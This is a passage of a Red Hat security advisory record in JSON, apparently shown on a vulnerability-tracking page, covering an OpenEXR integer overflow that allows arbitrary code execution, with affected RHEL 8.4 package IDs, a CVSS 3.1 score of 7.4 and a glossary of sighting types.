"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:12341"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.4.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-0:2.2.0-12.el8_4.1.src",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debuginfo-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-debugsource-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-0:2.2.0-12.el8_4.1.x86_64",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.i686",
"AppStream-8.4.0.Z.EUS.EXTENSION:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_4.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…